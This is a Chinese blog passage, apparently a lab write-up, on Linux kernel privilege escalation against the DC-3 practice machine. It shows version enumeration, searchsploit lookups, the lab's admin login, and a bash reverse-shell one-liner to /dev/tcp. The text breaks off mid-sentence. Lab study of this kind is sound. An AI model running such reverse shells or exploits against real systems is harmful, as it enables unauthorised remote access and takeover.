本篇文章仅用于学习记录,不得用于其他违规用途。一、内核漏洞提权1、常规查找查看内核版本信息uname -a uname -r查看系统发行版本cat /etc/issue cat /etc/*-release Ubuntu 16.04 4.4.0-21-generic搜索该版本漏洞,把对应版本的文件上传到服务器编译执行searchsploit Ubuntu16.04 searchsploit -u #更新数据库2、Ubuntu 16.04提权DC-3 靶机做实验 , 开局一个shell http://192.168.0.189/templates/beez3/error.php /bin/bash -i >& /dev/tcp/192.168.101.48/5656 0>&1 DC-3下载地址 https://www.vulnhub.com/entry/dc-32,312/ 后台 http://192.168.101.123/administrator/ admin snoopy发现是ubuntu16.04内核版本是4.4.0-21的,直接通过kali里面
易水哲
一个什么都会一点的白帽子
京公网安备11010802044340号